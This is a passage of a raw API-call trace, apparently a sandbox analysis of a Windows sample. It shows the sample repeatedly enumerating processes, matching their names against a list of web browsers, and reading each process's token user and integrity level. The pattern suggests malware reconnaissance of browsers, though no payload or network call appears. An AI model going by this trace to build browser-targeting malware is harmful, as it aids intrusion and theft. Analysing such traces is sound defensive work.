(lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0220.926] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0220.926] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0220.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0220.926] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.926] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.926] GetLastError () returned 0x7a [0220.926] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.926] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.926] CloseHandle (hObject=0xb8) returned 1 [0220.926] CloseHandle (hObject=0xb4) returned 1 [0220.926] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0220.926] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1681f0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.926] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.926] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.926] GetLastError () returned 0x7a [0220.926] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.926] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.926] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.926] CloseHandle (hObject=0xb8) returned 1 [0220.926] CloseHandle (hObject=0xb4) returned 1 [0220.926] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0220.926] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0220.926] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0220.926] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0220.926] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0220.926] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0220.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0220.926] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.926] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.926] GetLastError () returned 0x7a [0220.926] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.927] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.927] CloseHandle (hObject=0xb8) returned 1 [0220.927] CloseHandle (hObject=0xb4) returned 1 [0220.927] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0220.927] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x168350, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.927] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.927] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.927] GetLastError () returned 0x7a [0220.927] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.927] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.927] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.927] CloseHandle (hObject=0xb8) returned 1 [0220.927] CloseHandle (hObject=0xb4) returned 1 [0220.927] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0220.927] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0220.927] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0220.927] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0220.927] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0220.927] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0220.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0220.927] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.927] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.927] GetLastError () returned 0x7a [0220.927] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.927] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.927] CloseHandle (hObject=0xb8) returned 1 [0220.927] CloseHandle (hObject=0xb4) returned 1 [0220.927] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0220.927] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1684d0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.927] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.927] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.927] GetLastError () returned 0x7a [0220.928] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.928] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.928] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.928] CloseHandle (hObject=0xb8) returned 1 [0220.928] CloseHandle (hObject=0xb4) returned 1 [0220.928] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0220.928] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0220.928] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0220.928] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0220.928] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0220.928] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0220.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0220.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0220.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0220.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0220.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0220.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0220.928] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.928] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.928] GetLastError () returned 0x7a [0220.928] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.928] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.928] CloseHandle (hObject=0xb8) returned 1 [0220.928] CloseHandle (hObject=0xb4) returned 1 [0220.928] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0220.928] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x168a68, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.928] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.928] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.928] GetLastError () returned 0x7a [0220.928] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.928] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.928] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.928] CloseHandle (hObject=0xb8) returned 1 [0220.928] CloseHandle (hObject=0xb4) returned 1 [0220.928] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0220.928] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0220.928] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0220.929] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0220.929] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0220.929] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0220.929] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0220.929] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0222.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xc190) returned 0xc0000004 [0222.932] VirtualAlloc (lpAddress=0x0, dwSize=0xd190, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0222.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xd190, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0222.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0222.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0222.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0222.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0222.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0222.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0222.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0222.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0222.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0222.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0222.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0222.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0222.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0222.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0222.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0222.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0222.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0222.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0222.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0222.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0222.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0222.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0222.936] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.937] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.937] GetLastError () returned 0x7a [0222.937] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.937] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.937] CloseHandle (hObject=0xb8) returned 1 [0222.937] CloseHandle (hObject=0xb4) returned 1 [0222.937] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0222.937] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x169d10, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.938] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.938] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.938] GetLastError () returned 0x7a [0222.938] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.938] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.938] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.938] CloseHandle (hObject=0xb8) returned 1 [0222.938] CloseHandle (hObject=0xb4) returned 1 [0222.939] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0222.939] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0222.939] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0222.939] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0222.939] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0222.939] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0222.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0222.939] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.939] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.939] GetLastError () returned 0x7a [0222.939] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.940] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.940] CloseHandle (hObject=0xb8) returned 1 [0222.940] CloseHandle (hObject=0xb4) returned 1 [0222.940] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0222.940] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x165d88, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.940] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.940] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.940] GetLastError () returned 0x7a [0222.941] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.941] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.941] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.941] CloseHandle (hObject=0xb8) returned 1 [0222.941] CloseHandle (hObject=0xb4) returned 1 [0222.941] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0222.941] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0222.941] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0222.941] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0222.941] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0222.941] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0222.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0222.942] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.942] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.942] GetLastError () returned 0x7a [0222.942] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.942] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.942] CloseHandle (hObject=0xb8) returned 1 [0222.942] CloseHandle (hObject=0xb4) returned 1 [0222.942] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0222.943] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x165f20, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: 